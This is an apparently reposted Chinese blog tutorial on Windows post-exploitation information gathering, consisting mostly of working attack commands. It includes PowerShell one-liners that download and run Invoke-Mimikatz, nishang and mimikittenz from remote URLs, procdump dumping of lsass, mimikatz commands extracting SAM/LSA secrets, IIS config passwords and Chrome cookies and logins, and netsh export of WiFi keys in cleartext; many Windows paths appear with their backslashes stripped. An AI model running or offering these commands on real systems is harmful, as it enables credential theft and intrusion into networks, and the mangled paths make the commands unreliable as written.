后渗透攻防的信息收集

admin 2022年1月12日18:32:29评论128 views字数 3681阅读12分16秒阅读模式

from:https://www.secpulse.com/archives/51527.html

后渗透攻防的信息收集之cmd下信息收集

后渗透常见的信息收集思路

1.1 系统管理员密码

1.2 其他用户session,3389和ipc连接记录 各用户回收站信息收集

1.3 浏览器密码和浏览器cookies的获取 ie chrome firefox 等

1.4 windows无线密码获取。数据库密码获取

1.5 host文件获取和dns缓存信息收集 等等

1.6 杀软 补丁 进程 网络代理信息wpad信息。软件列表信息

1.7 计划任务 账号密码策略与锁定策略 共享文件夹 web服务器配置文件

1.8 vpn历史密码等 teamview密码等 启动项 iislog 等等

1.9 常用的后渗透信息收集工具。powershell+passrec的使用

 

1.1 常用来获取windows密码的工具

1.mimikatz

2.wce

3.getpass

4.QuarksPwDump

5.reg-sam

6.pwdump7

7.procdump.exe +mimikatz .......

 

1.2免杀抓取密码的两种方式

1.

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

tips:powershell 默认windows visa后才有

2. procdump lsass 进程导出技巧

C:tempprocdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits  C:tempprocdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits

然后本地使用mimikatz 还原密码

 

1.3 windows本地的信息收集

cmdkey /list

查看3389可信任链接

使用netpass.exe 即可知道密码

后渗透攻防的信息收集

net use

查看到已建立连接记录。

也是直接可以 用wmic at sc 等直接执行命令的

后渗透攻防的信息收集

1.4 vpn密码获取为例

mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

后渗透攻防的信息收集

其他工具如Dialupass.exe

感兴趣可以看看mimikatz dpapi模块的使用。很强大 sam 密码 ipc连接密码

后渗透攻防的信息收集

1.5 windows wifi密码的获取

netsh wlan export profile interface=无线网络连接 key=clear folder=C:

后渗透攻防的信息收集

1.6 ie浏览器的代理信息查看(网络代理信息wpad信息)

 

reg query "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings"

后渗透攻防的信息收集
后渗透攻防的信息收集

1.7 windows hosts/iis config

C:WindowsSystem32driversetchosts windows7 windows2008等

C:WINDOWSSYSTEM32DRIVERSETCHOSTS windows2003位置

提权情况下或者过了uac的情况下直接type一下就行了

iis-web路径

iis6 =========>cscript.exe C:InetpubAdminScriptsadsutil.vbs ENUM W3SVC/1/root

iis7 ,8 =======>appcmd.exe

%systemroot%/system32/inetsrv/appcmd.exe list site ——列出网站列表

%systemroot%system32inetsrvappcmd.exe list vdir ——列出网站物理路径

 

当然你也可以用mimikatz

mimiktaz 读取iis7配置文件密码

mimikatz.exe privilege::debug log "iis::apphost /in:"%systemroot%system32inetsrvconfigapplicationHost.config" /live" exit

 

1.8 windows 回收站的信息获取

 

其中$I开头的文件保存的是路径信息 $R保存的是文件

FOR /f "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get name^,sid') do dir /a /b C:$Recycle.Bin%d ^>%c.txt
$Recycler = (New-Object -ComObject Shell.Application).NameSpace(0xa);  foreach($file in $Recycler.items()){$file.path;$file.ExtendedProperty("{9B174B33-40FF-11D2-A27E-00C04FC30871} 2")+''+$file.name;$file.Type}

后渗透攻防的信息收集

1.9 chrome为例 的密码和cookies获取

 

%localappdata%googlechromeUSERDA~1defaultLOGIND~1

%localappdata%googlechromeUSERDA~1defaultUSERDA~1

%localappdata%googlechromeUSERDA~1defaultcookies

chrome的用户信息保存在本地文件为sqlite 数据库格式

 

2.0 mimikatz+WebBrowserPassView.exe获取浏览器的密码和cookie信息

 

mimikatz 读取chrome cookies

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%googlechromeUSERDA~1defaultcookies /unprotect" exit  mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%googlechromeUSERDA~1defaultUSERDA~1" exit  mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%googlechromeUSERDA~1defaultLOGIND~1" exit //读chrome密码

 

 

2.1 常用的信息收集工具介绍

passrec 工具包里面包含常用的密码恢复工具;

是内网渗透的好帮手

vnc

mail

vpn

router

ie

firefox

chrome 等等,有兴趣可以自己测试

后渗透攻防的信息收集

2.2 powershell 常用工具的信息收集工具

 

FTP访问、共享连接、putty连接 驱动、应用程序、hosts 文件、进程、无线网络记录

powershell "IEX (New-Object Net.WebClient).DownloadString(' https://github.com/samratashok/nishang/tree/master/Gather/Gather/Get-Information.ps1'); Get-Information"

正则过滤进程密码,已测windows7
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz

sqlserver密码获取工具Get-MSSQLCredentialPasswords.psm1 //未测

 

 

2.3 windows log的信息查看

 

windows自带的命令就可以

日志查看收集

1、Windows2003下默认存在eventquery.vbs

cscript c:WINDOWSsystem32eventquery.vbs /fi "Datetime eq 06/24/2015,01:00:00AM-06/24/2015,10:00:00AM" /l Security /V #查看SECURITY日志 2015-6.24 上午1点-上午10点日志

windows 7以上wevtutil 命令

2 .wevtutil qe security /rd:true /f:text /q:"*[system/eventid=4624 and 4623 and 4627]" #查询所有登录、注销相关的日志语法

3.第三方信息收集工具LogParser.exe psloglist.exe等

 

附件后渗透的信息收集.pptx:

 

链接: http://pan.baidu.com/s/1o8NFSaI 密码: ypd8


本文始发于微信公众号(关注安全技术):后渗透攻防的信息收集

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月12日18:32:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   后渗透攻防的信息收集https://cn-sec.com/archives/502154.html

发表评论

匿名网友 填写信息